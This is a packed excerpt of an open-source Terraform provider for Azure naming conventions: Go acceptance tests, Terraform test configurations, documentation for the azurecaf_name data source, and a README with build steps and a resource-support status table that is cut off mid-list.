					regexMatch("azurecaf_naming_convention.classic_acr", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_rg",
						"myrg",
						7,
						"rg"),
					regexMatch("azurecaf_naming_convention.classic_rg", regexp.MustCompile(Resources["rg"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_afw",
						"fire",
						8,
						"afw"),
					regexMatch("azurecaf_naming_convention.classic_afw", regexp.MustCompile(Resources["afw"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_asr",
						"recov",
						9,
						"asr"),
					regexMatch("azurecaf_naming_convention.classic_asr", regexp.MustCompile(Resources["asr"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_evh",
						"hub",
						7,
						"evh"),
					regexMatch("azurecaf_naming_convention.classic_evh", regexp.MustCompile(Resources["evh"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_kv",
						"passepartout",
						15,
						"kv"),
					regexMatch("azurecaf_naming_convention.classic_kv", regexp.MustCompile(Resources["kv"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_aks",
						"kubedemo",
						12,
						"aks"),
					regexMatch("azurecaf_naming_convention.classic_aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_aksdns",
						"kubedemodns",
						18,
						"aksdns"),
					regexMatch("azurecaf_naming_convention.classic_aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_la",
						"logs",
						7,
						"la"),
					regexMatch("azurecaf_naming_convention.classic_la", regexp.MustCompile(Resources["la"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_nic",
						"mynetcard",
						13,
						"nic"),
					regexMatch("azurecaf_naming_convention.classic_nic", regexp.MustCompile(Resources["nic"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_nsg",
						"sec",
						7,
						"nsg"),
					regexMatch("azurecaf_naming_convention.classic_nsg", regexp.MustCompile(Resources["nsg"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_pip",
						"mypip",
						9,
						"pip"),
					regexMatch("azurecaf_naming_convention.classic_pip", regexp.MustCompile(Resources["pip"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_snet",
						"snet",
						9,
						"snet"),
					regexMatch("azurecaf_naming_convention.classic_snet", regexp.MustCompile(Resources["snet"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_vnet",
						"vnet",
						9,
						"vnet"),
					regexMatch("azurecaf_naming_convention.classic_vnet", regexp.MustCompile(Resources["vnet"].ValidationRegExp), 1),
					// The configured name is longer than the vmw limit; the
					// expected value below is the trimmed form.
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_vmw",
						"winVMT",
						15,
						"vmw"),
					regexMatch("azurecaf_naming_convention.classic_vmw", regexp.MustCompile(Resources["vmw"].ValidationRegExp), 1),
					testAccCafNamingValidation(
						"azurecaf_naming_convention.classic_vml",
						"linuxVM",
						11,
						"vml"),
					regexMatch("azurecaf_naming_convention.classic_vml", regexp.MustCompile(Resources["vml"].ValidationRegExp), 1),
				),
			},
		},
	})
}
// testAccResourceCafClassicConfig is the Terraform configuration exercised by
// TestAccCafNamingConvention_Classic: one azurecaf_naming_convention resource
// per supported resource type, all using the "cafclassic" convention.
const testAccResourceCafClassicConfig = `
#Storage account test
resource "azurecaf_naming_convention" "classic_st" {
    convention      = "cafclassic"
    name            = "log"
    resource_type   = "st"
}
# Azure Automation Account
resource "azurecaf_naming_convention" "classic_aaa" {
    convention      = "cafclassic"
    name            = "automation"
    resource_type   = "aaa"
}
# Azure Container registry
resource "azurecaf_naming_convention" "classic_acr" {
    convention      = "cafclassic"
    name            = "registry"
    resource_type   = "acr"
}
# Resource Group
resource "azurecaf_naming_convention" "classic_rg" {
    convention      = "cafclassic"
    name            = "myrg"
    resource_type   = "rg"
}
# Azure Firewall
resource "azurecaf_naming_convention" "classic_afw" {
    convention      = "cafclassic"
    name            = "fire"
    resource_type   = "afw"
}
# Azure Recovery Vault
resource "azurecaf_naming_convention" "classic_asr" {
    convention      = "cafclassic"
    name            = "recov"
    resource_type   = "asr"
}
# Event Hub
resource "azurecaf_naming_convention" "classic_evh" {
    convention      = "cafclassic"
    name            = "hub"
    resource_type   = "evh"
}
# Key Vault
resource "azurecaf_naming_convention" "classic_kv" {
    convention      = "cafclassic"
    name            = "passepartout"
    resource_type   = "kv"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "classic_aks" {
    convention      = "cafclassic"
    name            = "kubedemo"
    resource_type   = "aks"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "classic_aksdns" {
    convention      = "cafclassic"
    name            = "kubedemodns"
    resource_type   = "aksdns"
}
# Log Analytics Workspace
resource "azurecaf_naming_convention" "classic_la" {
    convention      = "cafclassic"
    name            = "logs"
    resource_type   = "la"
}
# Network Interface
resource "azurecaf_naming_convention" "classic_nic" {
    convention      = "cafclassic"
    name            = "mynetcard"
    resource_type   = "nic"
}
# Network Security Group
resource "azurecaf_naming_convention" "classic_nsg" {
    convention      = "cafclassic"
    name            = "sec"
    resource_type   = "nsg"
}
# Public Ip
resource "azurecaf_naming_convention" "classic_pip" {
    convention      = "cafclassic"
    name            = "mypip"
    resource_type   = "pip"
}
# subnet
resource "azurecaf_naming_convention" "classic_snet" {
    convention      = "cafclassic"
    name            = "snet"
    resource_type   = "snet"
}
# Virtual Network
resource "azurecaf_naming_convention" "classic_vnet" {
    convention      = "cafclassic"
    name            = "vnet"
    resource_type   = "vnet"
}
# VM Windows
resource "azurecaf_naming_convention" "classic_vmw" {
    convention      = "cafclassic"
    name            = "winVMToolongShouldbetrimmed"
    resource_type   = "vmw"
}
# VM Linux
resource "azurecaf_naming_convention" "classic_vml" {
    convention      = "cafclassic"
    name            = "linuxVM"
    resource_type   = "vml"
}
`
<file_sep>/docs/data-sources/azurecaf_name.md
# azurecaf_name
The data source azurecaf_name generates a name for a resource (the recommended approach, as data sources are evaluated before resources are created).
The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource
* Generate random characters to append at the end of the resource name
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions)
* Allow passthrough mode (simply validate the output)
## Example usage
## Combined with Azure resource
The data source evaluates the name before the resource is created, so the generated name is visible at plan time.
```hcl
data "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
# prefixes = ["a", "b"]
# suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
resource "azurerm_resource_group" "rg" {
name = data.azurecaf_name.rg_example.result
location = "southeastasia"
}
```
```bash
data.azurecaf_name.rg_example: Reading...
data.azurecaf_name.rg_example: Read complete after 0s [id=rg-demogroup-wjyhr]
Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
+ create
Terraform will perform the following actions:
# azurerm_resource_group.rg will be created
+ resource "azurerm_resource_group" "rg" {
+ id = (known after apply)
+ location = "southeastasia"
+ name = "rg-demogroup-wjyhr"
}
Plan: 1 to add, 0 to change, 0 to destroy.
```
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffix added after the basename, this is can be used to append resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - defaults to ``0``: configures additional random characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resource and will be appended before the suffix(es).
* **random_seed** (optional) - defaults to ``0``: defines the seed to be used for the random generator. A value of 0 is not used as-is; instead a seed is generated based on the Unix time at generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, and random characters are ignored. The resource prefix is not added to the resulting string either.
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object (same as the result value)
* **result** - The generated named for an Azure Resource based on the input parameter and the selected naming convention
<file_sep>/README.md
# Azure Cloud Adoption Framework - Terraform provider
This provider implements a set of methodologies for naming convention implementation including the default Microsoft Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging.
## Using the Provider
You can simply consume the provider from the Terraform registry from the following URL: [https://registry.terraform.io/providers/aztfmod/azurecaf/latest](https://registry.terraform.io/providers/aztfmod/azurecaf/latest), then add it in your provider declaration as follow:
```hcl
terraform {
required_providers {
azurecaf = {
source = "aztfmod/azurecaf"
version = "1.2.10"
}
}
}
```
The azurecaf_name resource allows you to:
* Clean inputs to make sure they remain compliant with the allowed patterns for each Azure resource.
* Generate random characters to append at the end of the resource name.
* Handle prefix, suffixes (either manual or as per the Azure cloud adoption framework resource conventions).
* Allow passthrough mode (simply validate the output).
## Example usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
data "azurecaf_name" "rg_example" {
name = "demogroup"
resource_type = "azurerm_resource_group"
prefixes = ["a", "b"]
suffixes = ["y", "z"]
random_length = 5
clean_input = true
}
output "rg_example" {
value = data.azurecaf_name.rg_example.result
}
```
```bash
data.azurecaf_name.rg_example: Reading...
data.azurecaf_name.rg_example: Read complete after 0s [id=a-b-rg-demogroup-sjdeh-y-z]
Changes to Outputs:
+ rg_example = "a-b-rg-demogroup-sjdeh-y-z"
```
The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[5_random_chars]:
## Argument Reference
The following arguments are supported:
* **name** - (optional) the basename of the resource to create, the basename will be sanitized as per supported characters set for each Azure resources.
* **prefixes** (optional) - a list of prefix to append as the first characters of the generated name - prefixes will be separated by the separator character
* **suffixes** (optional) - a list of additional suffix added after the basename, this is can be used to append resource index (eg. vm-001). Suffixes are separated by the separator character
* **random_length** (optional) - defaults to ``0``: configures additional random characters to append to the generated resource name. Random characters will remain compliant with the set of allowed characters per resource and will be appended before the suffix(es).
* **random_seed** (optional) - defaults to ``0``: defines the seed to be used for the random generator. A value of 0 is not used as-is; instead a seed is generated based on the Unix time at generation.
* **resource_type** (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: azurerm_container_registry). See the Resource Type section
* **resource_types** (optional) - a list of additional resource type should you want to use the same settings for a set of resources
* **separator** (optional) - defaults to ``-``. The separator character to use between prefixes, resource type, name, suffixes, random character
* **clean_input** (optional) - defaults to ``true``. remove any noncompliant character from the name, suffix or prefix.
* **passthrough** (optional) - defaults to ``false``. Enables the passthrough mode - in that case only the clean input option is considered and the prefixes, suffixes, and random characters are ignored. The resource prefix is not added to the resulting string either.
* **use_slug** (optional) - defaults to ``true``. If a slug should be added to the name - If you put false no slug (the few letters that identify the resource type) will be added to the name.
## Attributes Reference
The following attributes are exported:
* **id** - The id of the naming convention object
* **result** - The generated named for an Azure Resource based on the input parameter and the selected naming convention
* **results** - The generated names for the Azure resources based on the resource_types list
## Resource types
We define resource types as per [naming-and-tagging](https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging)
The comprehensive list of resource type can be found [here](./docs/resources/azurecaf_name.md)
## Building the provider
Clone repository to: $GOPATH/src/github.com/aztfmod/terraform-provider-azurecaf
```
$ mkdir -p $GOPATH/src/github.com/aztfmod; cd $GOPATH/src/github.com/aztfmod
$ git clone https://github.com/aztfmod/terraform-provider-azurecaf.git
```
Enter the provider directory and build the provider
```
$ cd $GOPATH/src/github.com/aztfmod/terraform-provider-azurecaf
$ make build
```
## Developing the provider
If you wish to work on the provider, you'll first need Go installed on your machine (version 1.13+ is required). You'll also need to correctly setup a GOPATH, as well as adding $GOPATH/bin to your $PATH.
To display the makefile help run `make` or `make help`.
To compile the provider, run make build. This will build the provider and put the provider binary in the $GOPATH/bin directory.
```
$ make build
...
$ $GOPATH/bin/terraform-provider-azurecaf
...
```
## Testing
Running the acceptance test suite does not require an Azure subscription.
to run the unit test:
```
make unittest
```
to run the integration test
```
make test
```
## Related repositories
| Repo | Description |
|--------------------------------------------------------------------------------------------------|------------------------------------------------------------|
| [caf-terraform-landingzones](https://github.com/azure/caf-terraform-landingzones) | landing zones repo with sample and core documentations |
| [rover](https://github.com/aztfmod/rover) | devops toolset for operating landing zones |
| [azure_caf_provider](https://github.com/aztfmod/terraform-provider-azurecaf) | custom provider for naming conventions |
| [module](https://registry.terraform.io/modules/aztfmod) | official CAF module available in the Terraform registry |
## Community
Feel free to open an issue for feature or bug, or to submit a PR.
In case you have any question, you can reach out to tf-landingzones at microsoft dot com.
You can also reach us on [Gitter](https://gitter.im/aztfmod/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
## Contributing
information about contributing can be found at [CONTRIBUTING.md](.github/CONTRIBUTING.md)
## Resource Status
This is the current comprehensive status of the resources implemented in the provider, compared with the current list of resources in the azurerm terraform provider.
|resource | status |
|---|---|
|azurerm_aadb2c_directory | ✔ |
|azurerm_advanced_threat_protection | ❌ |
|azurerm_advisor_recommendations | ❌ |
|azurerm_analysis_services_server | ✔ |
|azurerm_api_management | ✔ |
|azurerm_api_management_api | ✔ |
|azurerm_api_management_api_diagnostic | ❌ |
|azurerm_api_management_api_operation | ❌ |
|azurerm_api_management_api_operation_policy | ❌ |
|azurerm_api_management_api_operation_tag | ✔ |
|azurerm_api_management_api_policy | ❌ |
|azurerm_api_management_api_schema | ❌ |
|azurerm_api_management_api_version_set | ❌ |
|azurerm_api_management_authorization_server | ❌ |
|azurerm_api_management_backend | ✔ |
|azurerm_api_management_certificate | ✔ |
|azurerm_api_management_custom_domain | ✔ |
|azurerm_api_management_diagnostic | ❌ |
|azurerm_api_management_gateway | ✔ |
|azurerm_api_management_group | ✔ |
|azurerm_api_management_group_user | ✔ |
|azurerm_api_management_identity_provider_aad | ❌ |
|azurerm_api_management_identity_provider_facebook | ❌ |
|azurerm_api_management_identity_provider_google | ❌ |
|azurerm_api_management_identity_provider_microsoft | ❌ |
|azurerm_api_management_identity_provider_twitter | ❌ |
|azurerm_api_management_logger | ✔ |
|azurerm_api_management_named_value | ❌ |
|azurerm_api_management_openid_connect_provider | ❌ |
|azurerm_api_management_product | ❌ |
|azurerm_api_management_product_api | ❌ |
|azurerm_api_management_product_group | ❌ |
|azurerm_api_management_product_policy | ❌ |
|azurerm_api_management_property | ❌ |
|azurerm_api_management_subscription | ❌ |
|azurerm_api_management_user | ✔ |
|azurerm_app_configuration | ✔ |
|azurerm_app_service | ✔ |
|azurerm_app_service_active_slot | ❌ |
|azurerm_app_service_certificate | ❌ |
|azurerm_app_service_certificate_order | ❌ |
|azurerm_app_service_custom_hostname_binding | ❌ |
|azurerm_app_service_environment | ✔ |
|azurerm_app_service_hybrid_connection | ❌ |
|azurerm_app_service_plan | ✔ |
|azurerm_app_service_slot | ❌ |
|azurerm_app_service_slot_virtual_network_swift_connection | ❌ |
|azurerm_app_service_source_control_token | ❌ |
|azurerm_app_service_virtual_network_swift_connection | ❌ |
|azurerm_application_gateway | ✔ |
|azurerm_application_insights | ✔ |
|azurerm_application_insights_analytics_item | ❌ |
|azurerm_application_insights_api_key | ❌ |
|azurerm_application_insights_web_test | ✔ |
|azurerm_application_security_group | ✔ |
|azurerm_attestation | ❌ |
|azurerm_automation_account | ✔ |
|azurerm_automation_certificate | ✔ |
|azurerm_automation_connection | ❌ |
|azurerm_automation_connection_certificate | ❌ |
|azurerm_automation_connection_classic_certificate | ❌ |
|azurerm_automation_connection_service_principal | ❌ |
|azurerm_automation_credential | ✔ |
|azurerm_automation_dsc_configuration | ❌ |
|azurerm_automation_dsc_nodeconfiguration | ❌ |
|azurerm_automation_hybrid_runbook_worker_group | ✔ |
|azurerm_automation_job_schedule | ✔ |
|azurerm_automation_module | ❌ |
|azurerm_automation_runbook | ✔ |
|azurerm_automation_schedule | ✔ |
|azurerm_automation_variable_bool | ❌ |
|azurerm_automation_variable_datetime | ❌ |
|azurerm_automation_variable_int | ❌ |
|azurerm_automation_variable_string | ❌ |
|azurerm_availability_set | ✔ |
|azurerm_backup_container_storage_account | ❌ |
|azurerm_backup_policy_file_share | ❌ |
|azurerm_backup_policy_vm | ❌ |
|azurerm_backup_protected_file_share | ❌ |
|azurerm_backup_protected_vm | ❌ |
|azurerm_bastion_host | ✔ |
|azurerm_batch_account | ✔ |
|azurerm_batch_application | ✔ |
|azurerm_batch_certificate | ✔ |
|azurerm_batch_pool | ✔ |
|azurerm_blueprint_assignment | ❌ |
|azurerm_blueprint_definition | ❌ |
|azurerm_blueprint_published_version | ❌ |
|azurerm_bot_channel_directline | ✔ |
|azurerm_bot_channel_email | ❌ |
|azurerm_bot_channel_ms_teams | ✔ |
|azurerm_bot_channel_slack | ✔ |
|azurerm_bot_channels_registration | ✔ |
|azurerm_bot_connection | ✔ |
|azurerm_bot_web_app | ✔ |
|azurerm_cdn_endpoint | ✔ |
|azurerm_cdn_frontdoor_custom_domain | ✔ |
|azurerm_cdn_frontdoor_endpoint | ✔ |
|azurerm_cdn_frontdoor_firewall_policy | ✔ |
|azurerm_cdn_frontdoor_origin | ✔ |
|azurerm_cdn_frontdoor_origin_group | ✔ |
|azurerm_cdn_frontdoor_profile | ✔ |
|azurerm_cdn_frontdoor_route | ✔ |
|azurerm_cdn_frontdoor_rule | ✔ |
|azurerm_cdn_frontdoor_rule_set | ✔ |
|azurerm_cdn_frontdoor_secret | ✔ |
|azurerm_cdn_frontdoor_security_policy | ✔ |
|azurerm_cdn_profile | ✔ |
|azurerm_client_config | ❌ |
|azurerm_cognitive_account | ✔ |
|azurerm_communication_service | ✔ |
|azurerm_consumption_budget_resource_group | ✔ |
|azurerm_consumption_budget_subscription | ✔ |
|azurerm_container_app | ✔ |
|azurerm_container_app_environment | ✔ |
|azurerm_container_group | ❌ |
|azurerm_container_registry | ✔ |
|azurerm_container_registry_webhook | ✔ |
|azurerm_cosmosdb_account | ✔ |
|azurerm_cosmosdb_cassandra_keyspace | ❌ |
|azurerm_cosmosdb_gremlin_database | ❌ |
|azurerm_cosmosdb_gremlin_graph | ❌ |
|azurerm_cosmosdb_mongo_collection | ❌ |
|azurerm_cosmosdb_mongo_database | ❌ |
|azurerm_cosmosdb_sql_container | ❌ |
|azurerm_cosmosdb_sql_database | ❌ |
|azurerm_cosmosdb_sql_stored_procedure | ❌ |
|azurerm_cosmosdb_table | ❌ |
|azurerm_cost_management_export_resource_group | ❌ |
|azurerm_custom_provider | ✔ |
|azurerm_dashboard | ✔ |
|azurerm_data_factory | ✔ |
|azurerm_data_factory_dataset_azure_blob | ✔ |
|azurerm_data_factory_dataset_cosmosdb_sqlapi | ✔ |
|azurerm_data_factory_dataset_delimited_text | ✔ |
|azurerm_data_factory_dataset_http | ✔ |
|azurerm_data_factory_dataset_json | ✔ |
|azurerm_data_factory_dataset_mysql | ✔ |
|azurerm_data_factory_dataset_postgresql | ✔ |
|azurerm_data_factory_dataset_sql_server_table | ✔ |
|azurerm_data_factory_integration_runtime_managed | ✔ |
|azurerm_data_factory_integration_runtime_self_hosted | ❌ |
|azurerm_data_factory_linked_service_azure_blob_storage | ✔ |
|azurerm_data_factory_linked_service_azure_databricks | ✔ |
|azurerm_data_factory_linked_service_azure_file_storage | ❌ |
|azurerm_data_factory_linked_service_azure_function | ✔ |
|azurerm_data_factory_linked_service_azure_sql_database | ✔ |
|azurerm_data_factory_linked_service_cosmosdb | ✔ |
|azurerm_data_factory_linked_service_data_lake_storage_gen2 | ✔ |
|azurerm_data_factory_linked_service_key_vault | ✔ |
|azurerm_data_factory_linked_service_mysql | ✔ |
|azurerm_data_factory_linked_service_postgresql | ✔ |
|azurerm_data_factory_linked_service_sftp | ✔ |
|azurerm_data_factory_linked_service_sql_server | ✔ |
|azurerm_data_factory_linked_service_web | ✔ |
|azurerm_data_factory_pipeline | ✔ |
|azurerm_data_factory_trigger_schedule | ✔ |
|azurerm_data_lake_analytics_account | ✔ |
|azurerm_data_lake_analytics_firewall_rule | ✔ |
|azurerm_data_lake_store | ✔ |
|azurerm_data_lake_store_file | ❌ |
|azurerm_data_lake_store_firewall_rule | ✔ |
|azurerm_data_protection_backup_policy_blob_storage | ✔ |
|azurerm_data_protection_backup_policy_disk | ✔ |
|azurerm_data_protection_backup_policy_postgresql | ✔ |
|azurerm_data_protection_backup_vault | ✔ |
|azurerm_data_share | ❌ |
|azurerm_data_share_account | ❌ |
|azurerm_data_share_dataset_blob_storage | ❌ |
|azurerm_data_share_dataset_data_lake_gen1 | ❌ |
|azurerm_data_share_dataset_data_lake_gen2 | ❌ |
|azurerm_data_share_dataset_kusto_cluster | ❌ |
|azurerm_data_share_dataset_kusto_database | ❌ |
|azurerm_database_migration_project | ✔ |
|azurerm_database_migration_service | ✔ |
|azurerm_databricks_workspace | ✔ |
|azurerm_dedicated_hardware_security_module | ❌ |
|azurerm_dedicated_host | ✔ |
|azurerm_dedicated_host_group | ✔ |
|azurerm_dev_test_global_vm_shutdown_schedule | ❌ |
|azurerm_dev_test_lab | ✔ |
|azurerm_dev_test_linux_virtual_machine | ✔ |
|azurerm_dev_test_policy | ❌ |
|azurerm_dev_test_schedule | ❌ |
|azurerm_dev_test_virtual_network | ❌ |
|azurerm_dev_test_windows_virtual_machine | ✔ |
|azurerm_devspace_controller | ❌ |
|azurerm_digital_twins_endpoint_eventgrid | ✔ |
|azurerm_digital_twins_endpoint_eventhub | ✔ |
|azurerm_digital_twins_endpoint_servicebus | ✔ |
|azurerm_digital_twins_instance | ✔ |
|azurerm_disk_encryption_set | ✔ |
|azurerm_dns_a_record | ❌ |
|azurerm_dns_aaaa_record | ❌ |
|azurerm_dns_caa_record | ❌ |
|azurerm_dns_cname_record | ❌ |
|azurerm_dns_mx_record | ❌ |
|azurerm_dns_ns_record | ❌ |
|azurerm_dns_ptr_record | ❌ |
|azurerm_dns_srv_record | ❌ |
|azurerm_dns_txt_record | ❌ |
|azurerm_dns_zone | ✔ |
|azurerm_eventgrid_domain | ✔ |
|azurerm_eventgrid_domain_topic | ✔ |
|azurerm_eventgrid_event_subscription | ✔ |
|azurerm_eventgrid_system_topic | ❌ |
|azurerm_eventgrid_topic | ✔ |
|azurerm_eventhub | ✔ |
|azurerm_eventhub_authorization_rule | ✔ |
|azurerm_eventhub_cluster | ❌ |
|azurerm_eventhub_consumer_group | ✔ |
|azurerm_eventhub_namespace | ✔ |
|azurerm_eventhub_namespace_authorization_rule | ✔ |
|azurerm_eventhub_namespace_disaster_recovery_config | ✔ |
|azurerm_express_route_circuit | ✔ |
|azurerm_express_route_circuit_authorization | ❌ |
|azurerm_express_route_circuit_peering | ❌ |
|azurerm_express_route_gateway | ✔ |
|azurerm_federated_identity_credential | ✔ |
|azurerm_firewall | ✔ |
|azurerm_firewall_application_rule_collection | ❌ |
|azurerm_firewall_nat_rule_collection | ❌ |
|azurerm_firewall_network_rule_collection | ❌ |
|azurerm_firewall_policy | ✔ |
|azurerm_firewall_policy_rule_collection_group | ❌ |
|azurerm_frontdoor | ✔ |
|azurerm_frontdoor_custom_https_configuration | ❌ |
|azurerm_frontdoor_firewall_policy | ✔ |
|azurerm_function_app | ✔ |
|azurerm_function_app_host_keys | ❌ |
|azurerm_function_app_slot | ✔ |
|azurerm_hdinsight_cluster | ❌ |
|azurerm_hdinsight_hadoop_cluster | ✔ |
|azurerm_hdinsight_hbase_cluster | ✔ |
|azurerm_hdinsight_interactive_query_cluster | ✔ |
|azurerm_hdinsight_kafka_cluster | ✔ |
|azurerm_hdinsight_ml_services_cluster | ✔ |
|azurerm_hdinsight_rserver_cluster | ✔ |
|azurerm_hdinsight_spark_cluster | ✔ |
|azurerm_hdinsight_storm_cluster | ✔ |
|azurerm_healthcare_dicom_service | ✔ |
|azurerm_healthcare_fhir_service | ✔ |
|azurerm_healthcare_medtech_service | ✔ |
|azurerm_healthcare_service | ✔ |
|azurerm_healthcare_workspace | ✔ |
|azurerm_hpc_cache | ❌ |
|azurerm_hpc_cache_blob_target | ❌ |
|azurerm_hpc_cache_nfs_target | ❌ |
|azurerm_image | ✔ |
|azurerm_images | ❌ |
|azurerm_integration_service_environment | ✔ |
|azurerm_iot_security_device_group | ✔ |
|azurerm_iot_security_solution | ✔ |
|azurerm_iot_time_series_insights_access_policy | ❌ |
|azurerm_iot_time_series_insights_reference_data_set | ❌ |
|azurerm_iot_time_series_insights_standard_environment | ❌ |
|azurerm_iotcentral_application | ✔ |
|azurerm_iothub | ✔ |
|azurerm_iothub_certificate | ✔ |
|azurerm_iothub_consumer_group | ✔ |
|azurerm_iothub_dps | ✔ |
|azurerm_iothub_dps_certificate | ✔ |
|azurerm_iothub_dps_shared_access_policy | ✔ |
|azurerm_iothub_endpoint_eventhub | ❌ |
|azurerm_iothub_endpoint_servicebus_queue | ❌ |
|azurerm_iothub_endpoint_servicebus_topic | ❌ |
|azurerm_iothub_endpoint_storage_container | ❌ |
|azurerm_iothub_fallback_route | ❌ |
|azurerm_iothub_route | ❌ |
|azurerm_iothub_shared_access_policy | ✔ |
|azurerm_ip_group | ✔ |
|azurerm_key_vault | ✔ |
|azurerm_key_vault_access_policy | ❌ |
|azurerm_key_vault_certificate | ✔ |
|azurerm_key_vault_certificate_issuer | ❌ |
|azurerm_key_vault_key | ✔ |
|azurerm_key_vault_secret | ✔ |
|azurerm_kubernetes_cluster | ✔ |
|azurerm_kubernetes_cluster_node_pool | ❌ |
|azurerm_kubernetes_fleet_manager | ✔ |
|azurerm_kubernetes_service_versions | ❌ |
|azurerm_kusto_attached_database_configuration | ❌ |
|azurerm_kusto_cluster | ✔ |
|azurerm_kusto_cluster_customer_managed_key | ❌ |
|azurerm_kusto_cluster_principal_assignment | ❌ |
|azurerm_kusto_database | ✔ |
|azurerm_kusto_database_principal | ❌ |
|azurerm_kusto_database_principal_assignment | ❌ |
|azurerm_kusto_eventhub_data_connection | ✔ |
|azurerm_lb | ✔ |
|azurerm_lb_backend_address_pool | ✔ |
|azurerm_lb_backend_address_pool_address | ✔ |
|azurerm_lb_nat_pool | ✔ |
|azurerm_lb_nat_rule | ✔ |
|azurerm_lb_outbound_rule | ✔ |
|azurerm_lb_probe | ✔ |
|azurerm_lb_rule | ✔ |
|azurerm_lighthouse_assignment | ❌ |
|azurerm_lighthouse_definition | ❌ |
|azurerm_linux_virtual_machine | ✔ |
|azurerm_linux_virtual_machine_scale_set | ✔ |
|azurerm_linux_web_app | ✔ |
|azurerm_linux_web_app_slot | ⚠ |
|azurerm_local_network_gateway | ✔ |
|azurerm_log_analytics_cluster | ✔ |
|azurerm_log_analytics_data_export_rule | ❌ |
|azurerm_log_analytics_datasource_windows_event | ❌ |
|azurerm_log_analytics_datasource_windows_performance_counter | ❌ |
|azurerm_log_analytics_linked_service | ❌ |
|azurerm_log_analytics_linked_storage_account | ❌ |
|azurerm_log_analytics_saved_search | ❌ |
|azurerm_log_analytics_solution | ❌ |
|azurerm_log_analytics_storage_insights | ✔ |
|azurerm_log_analytics_workspace | ✔ |
|azurerm_logic_app_action_custom | ✔ |
|azurerm_logic_app_action_http | ✔ |
|azurerm_logic_app_integration_account | ✔ |
|azurerm_logic_app_trigger_custom | ✔ |
|azurerm_logic_app_trigger_http_request | ✔ |
|azurerm_logic_app_trigger_recurrence | ✔ |
|azurerm_logic_app_workflow | ✔ |
|azurerm_machine_learning_compute_instance | ✔ |
|azurerm_machine_learning_workspace | ✔ |
|azurerm_maintenance_assignment_dedicated_host | ❌ |
|azurerm_maintenance_assignment_virtual_machine | ❌ |
|azurerm_maintenance_configuration | ✔ |
|azurerm_managed_application | ❌ |
|azurerm_managed_application_definition | ❌ |
|azurerm_managed_disk | ✔ |
|azurerm_management_group | ❌ |
|azurerm_management_lock | ❌ |
|azurerm_maps_account | ✔ |
|azurerm_mariadb_configuration | ❌ |
|azurerm_mariadb_database | ✔ |
|azurerm_mariadb_firewall_rule | ✔ |
|azurerm_mariadb_server | ✔ |
|azurerm_mariadb_virtual_network_rule | ✔ |
|azurerm_marketplace_agreement | ❌ |
|azurerm_media_services_account | ❌ |
|azurerm_monitor_action_group | ✔ |
|azurerm_monitor_action_rule_action_group | ❌ |
|azurerm_monitor_action_rule_suppression | ❌ |
|azurerm_monitor_activity_log_alert | ❌ |
|azurerm_monitor_autoscale_setting | ✔ |
|azurerm_monitor_diagnostic_categories | ❌ |
|azurerm_monitor_diagnostic_setting | ✔ |
|azurerm_monitor_log_profile | ❌ |
|azurerm_monitor_metric_alert | ✔ |
|azurerm_monitor_private_link_scope | ✔ |
|azurerm_monitor_scheduled_query_rules_alert | ✔ |
|azurerm_monitor_scheduled_query_rules_log | ❌ |
|azurerm_monitor_smart_detector_alert_rule | ❌ |
|azurerm_mssql_database | ✔ |
|azurerm_mssql_database_extended_auditing_policy | ❌ |
